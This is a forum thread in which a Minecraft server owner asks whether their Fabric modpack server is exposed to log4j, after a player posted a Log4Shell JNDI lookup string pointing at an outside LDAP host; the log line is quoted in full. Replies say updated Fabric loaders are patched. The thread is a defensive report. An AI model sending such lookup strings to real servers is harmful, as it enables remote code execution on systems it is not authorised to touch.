log4j?

[cocus]

Hi! I've been bombarded with some users (namely FermatSleep, which seems to be "rafael") on my Windows 10 server. I didn't see anything unusual except for:

[10:00:07] [Server thread/INFO]: FermatSleep[/195.154.52.77:56322] logged in with entity id 15317 at (-0.5, 72.0, 972.5)
[10:00:07] [Server thread/WARN]: Player class_3222['FermatSleep'/15317, l='ServerLevel[world]', x=-0.50, y=72.00, z=972.50] could not be synced because server networking isn't set up yet.
[10:00:07] [Server thread/INFO]: FermatSleep joined the game
[10:00:09] [Server thread/INFO]: <FermatSleep> ${jndi:ldap://195.154.52.77:1389/a}
[10:00:09] [Server thread/INFO]: FermatSleep lost connection: Disconnected
[10:00:09] [Server thread/INFO]: FermatSleep left the game

But all the other users on reddit are reporting the same thing and the same IPs. By the looks of it, the **shole only targeted Linux servers... The thing is, is AOF4 affected? or any of the fabric server jars or anything? I didn't see any log4j jars but that doesn't mean there's none. I tried the ldap log4js tests by commenting on my own account while connected to the server, but... Nothing showed up. Not even if I ran ldapsearch on those urls provided by some tools. So I wanted to know more. Do I need to take some measures? (I've already blocked his IP address tho!) Thanks

[haykam821]

If you had Fabric loader 0.12.9 or later, you should be fine. You likely have this loader version already if you use All of Fabric 4 versions 1.1.2 or 1.1.3.

[cocus]

I'm using 1.1.3, and the previous version I had was 0.09 which I promptly updated on the 14th of december of 2021.

However these messages appeared yesterday and took me by surprise. Thanks for the confirmation

[yorii]

Google his name, he does this on all minecraft servers on the entire planet, it's a miracle nobody has banned his account or gotten his ISP to block him..